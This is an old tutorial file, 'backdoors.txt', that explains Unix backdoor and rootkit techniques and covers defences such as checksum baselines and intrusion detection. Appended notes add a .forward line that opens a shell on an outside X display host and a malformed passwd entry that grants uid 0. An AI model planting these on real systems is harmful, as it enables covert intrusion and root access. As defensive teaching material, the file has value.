backdoors.txt

黑客培训教程

An intruder could rename the sniffer program to a legitimate service like
in.syslog and run it.  Thus when an administrator does a "ps" or looks at
what is running, the standard service names appear.

An intruder could modify the library routines so that "ps" does not show
all the processes.

An intruder could patch a backdoor or program into an interrupt driven
routine so it does not appear in the process table.  An example backdoor
using this technique is amod.tar.gz available on
 http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html

An intruder could modify the kernel to hide certain processes as well.

Rootkit

One of the most popular packages to install backdoors is rootkit.  It can
easily be located using Web search engines.  From the Rootkit README, here
are the typical files that get installed:

z2 - removes entries from utmp, wtmp, and lastlog.
Es - rokstar's ethernet sniffer for sun4 based kernels.
Fix - try to fake checksums, install with same dates/perms/u/g.
Sl - become root via a magic password sent to login.
Ic - modified ifconfig to remove PROMISC flag from output.
ps: - hides the processes.
Ns - modified netstat to hide connections to certain machines.
Ls - hides certain directories and files from being listed.
du5 - hides how much space is being used on your hard drive.
ls5 -  hides certain files and directories from being listed.


Network traffic backdoors

Not only do intruders want to hide their tracks on the machine, but also
they want to hide their network traffic as much as possible.  These network
traffic backdoors sometimes allow an intruder to gain access through a
firewall.  There are many network backdoor programs that allow an intruder
to set up on a certain port number on a machine that will allow access
without ever going through the normal services.  Because the traffic is
going to a non-standard network port, the administrator can overlook the
intruder's traffic.  These network traffic backdoors are typically using
TCP, UDP, and ICMP, but it could be many other kinds of packets.

TCP Shell Backdoors

The intruder can set up these TCP Shell backdoors on some high port number
possibly where the firewall is not blocking that TCP port.  Many times,
they will be protected with a password just so that an administrator that
connects to it, will not immediately see shell access.  An administrator
can look for these connections with netstat to see what ports are listening
and where current connections are going to and from.  Many times, these
backdoors allow an intruder to get past TCP Wrapper technology.  These
backdoors could be run on the SMTP port, which many firewalls allow traffic
to pass for e-mail.

UDP Shell Backdoors

Administrator many times can spot a TCP connection and notice the odd
behavior, while UDP shell backdoors lack any connection so netstat would
not show an intruder accessing the Unix machine.  Many firewalls have been
configured to allow UDP packets for services like DNS through.  Many times,
intruders will place the UDP Shell backdoor on that port and it will be
allowed to by-pass the firewall.

ICMP Shell Backdoors

Ping is one of the most common ways to find out if a machine is alive by
sending and receiving ICMP packets.  Many firewalls allow outsiders to ping
internal machines.  An intruder can put data in the Ping ICMP packets and
tunnel a shell between the pinging machines.  An administrator may notice a
flurry of Ping packets, but unless the administrator looks at the data in
the packets, an intruder can be unnoticed.

Encrypted Link

An administrator can set up a sniffer trying to see data appears as someone
accessing a shell, but an intruder can add encryption to the Network
traffic backdoors and it becomes almost impossible to determine what is
actually being transmitted between two machines.

Windows NT

Because Windows NT does not easily allow multiple users on a single machine
and remote access similar as Unix, it becomes harder for the intruder to
break into Windows NT, install a backdoor, and launch an attack from it.
Thus you will find more frequently network attacks that are spring boarded
from a Unix box than Windows NT. As Windows NT advances in multi-user
technologies, this may give a higher frequency of intruders who use Windows
NT to their advantage.  And if this does happen, many of the concepts from
Unix backdoors can be ported to Windows NT and administrators can be ready
for the intruder.  Today, there are already telnet daemons available for
Windows NT.  With Network Traffic backdoors, they are very feasible for
intruders to install on Windows NT.

Solutions

As backdoor technology advances, it becomes even harder for administrators
to determine if an intruder has gotten in or if they have been successfully
locked out.

Assessment

One of the first steps in being proactive is to assess how vulnerable your
network is, thus being able to figure out what holes exist that should be
fixed.  Many commercial tools exist to help scan and audit the network and
systems for vulnerabilities.  Many companies could dramatically improve
their security if they only installed the security patches made freely
available by their vendors.

MD5 Baselines

One necessary component of a system scanner is MD5 checksum baselines.
 This MD5 baseline should be built up before a hacker attack with clean
systems.  Once a hacker is in and has installed backdoors, trying to create
a baseline after the fact could incorporate the backdoors into the
baseline.  Several companies had been hacked and had backdoors installed on
their systems for many months. Overtime, all the backups of the systems
contained the backdoors.   When some of these companies found out they had
a hacker, they restored a backup in hopes of removing any backdoors.  The
effort was futile since they were restoring all the files, even the
backdoored ones.  The binary baseline comparison needs to be done before an
attack happens.

Intrusion detection

Intrusion detection is becoming more important as organizations are hooking
up and allowing connections to some of their machines.  Most of the older
intrusion detection technology was log-based events.  The latest intrusion
detection system (IDS) technology is based on real-time sniffing and
network traffic security analysis.  Many of the network traffic backdoors
can now easily be detected.  The latest IDS technology can take a look at
the DNS UDP packets and determine if it matches the DNS protocol requests.
 If the data on the DNS port does not match the DNS protocol, an alert flag
can be signaled and the data captured for further analysis.   The same
principle can be applied to the data in an ICMP packet to see if it is the
normal ping data or if it is carrying encrypted shell session.

Boot from CD-ROM.

Some administrators may want to consider booting from CD-ROM thus
eliminating the possibility of an intruder installing a backdoor on the
CD-ROM.  The problem with this method is the cost and time of implementing
this solution enterprise wide.

Vigilant

Because the security field is changing so fast, with new vulnerabilities
being announced daily and intruders are constantly designing new attack and
backdoor techniques, no security technology is effective without vigilance.

Be aware that no defense is foolproof, and that there is no substitute for
diligent attention.

-------------------------------------------------------------------------


you may want to add:

    .forward Backdoor

    On Unix machines, placing commands into the .forward file was also
    a common method of regaining access.  For the account ``username''
    a .forward file might be constructed as follows:

        \username
        |"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

    permutations of this method include alteration of the systems mail
    aliases file (most commonly located at /etc/aliases).  Note that
    this is a simple permutation, the more advanced  can run a simple
    script from the forward file that can take arbitrary commands via
    stdin (after minor preprocessing).

PS: The above method is also useful gaining access a companies
        mailhub (assuming there is a shared a home directory FS on
        the client and server).

> Using smrsh can effectively negate this backdoor (although it's quite
> possibly still a problem if you allow things like elm's filter or
> procmail which can run programs themselves...).


---------------------------------------------------------------------------


you may want to add this "feature" that can act as a backdoor:

when specifying a wrong uid/gid in the /etc/password file,
most login(1) implementations will fail to detect the wrong
uid/gid and atoi(3) will set uid/gid to 0, giving superuser
privileges.

example:
rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh
on Linux boxes, this will give uid 0 to user rmartin.